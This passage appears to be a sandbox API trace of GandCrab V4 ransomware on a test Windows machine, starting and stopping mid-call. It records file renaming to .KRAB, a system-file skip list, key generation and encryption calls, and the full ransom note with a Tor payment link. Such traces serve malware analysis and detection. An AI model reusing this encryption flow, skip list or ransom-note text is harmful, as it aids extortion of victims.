(lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\credhist.krab")) returned 1 [0061.776] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.776] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.776] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0061.776] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0061.776] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a08d2ca4dee3d.lock" [0061.776] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.776] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 84 [0061.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\d2ca4a08d2ca4dee3d.lock") returned 79 [0061.776] lstrlenW (lpString=".lock") returned 5 [0061.776] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.777] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0061.777] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.777] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.777] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.777] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0061.777] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0061.777] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\KRAB-DECRYPT.txt" [0061.777] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.778] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\KRAB-DECRYPT.txt.KRAB") returned 77 [0061.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\KRAB-DECRYPT.txt") returned 72 [0061.778] lstrlenW (lpString=".txt") returned 4 [0061.778] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.778] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0061.778] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\KRAB-DECRYPT.txt") returned 72 [0061.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\KRAB-DECRYPT.txt") returned 72 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0061.778] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0061.779] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0061.779] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.779] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.779] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2=".") returned 1 [0061.779] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="..") returned 1 [0061.779] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000" [0061.779] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\" [0061.779] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0061.779] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0061.779] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0061.779] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0061.779] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0061.779] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.780] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.780] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\KRAB-DECRYPT.txt") returned 119 [0061.780] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0061.780] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0061.780] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0061.781] CloseHandle (hObject=0x440) returned 1 [0061.782] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.782] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.782] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x3d1)) [0061.782] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.782] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0061.782] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0061.783] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned 125 [0061.783] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0061.783] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.783] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.784] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned 102 [0061.784] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0061.784] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd820 [0061.784] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.784] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.784] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.784] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.784] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.784] lstrcmpW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2=".") returned 1 [0061.784] lstrcmpW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="..") returned 1 [0061.784] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="496f2c5b-a90f-4380-b805-3bf6ac63451b" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b" [0061.784] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.784] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b.KRAB") returned 143 [0061.784] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned 138 [0061.784] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned 138 [0061.784] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b") returned 138 [0061.784] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="desktop.ini") returned -1 [0061.784] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="autorun.inf") returned -1 [0061.784] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="ntuser.dat") returned -1 [0061.784] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="iconcache.db") returned -1 [0061.784] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="bootsect.bak") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="boot.ini") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="ntuser.dat.log") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="thumbs.db") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="KRAB-DECRYPT.html") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="KRAB-DECRYPT.txt") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="CRAB-DECRYPT.txt") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="ntldr") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="NTDETECT.COM") returned -1 [0061.785] lstrcmpiW (lpString1="496f2c5b-a90f-4380-b805-3bf6ac63451b", lpString2="Bootfont.bin") returned -1 [0061.785] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.790] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.790] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.791] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.791] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.791] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.791] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.791] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.791] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.792] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.792] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.792] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.792] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.792] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.792] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.794] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.794] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd8e0) returned 1 [0061.794] CryptGetKeyParam (in: hKey=0xfbd8e0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.794] CryptEncrypt (in: hKey=0xfbd8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.794] GetLastError () returned 0x0 [0061.794] CryptDestroyKey (hKey=0xfbd8e0) returned 1 [0061.794] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.795] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.795] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd320) returned 1 [0061.795] CryptGetKeyParam (in: hKey=0xfbd320, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.795] CryptEncrypt (in: hKey=0xfbd320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.795] GetLastError () returned 0x0 [0061.795] CryptDestroyKey (hKey=0xfbd320) returned 1 [0061.795] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.796] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.796] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.796] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.797] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x1d4, lpOverlapped=0x0) returned 1 [0061.810] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.810] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x1d4, lpOverlapped=0x0) returned 1 [0061.811] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.813] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.817] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.818] CloseHandle 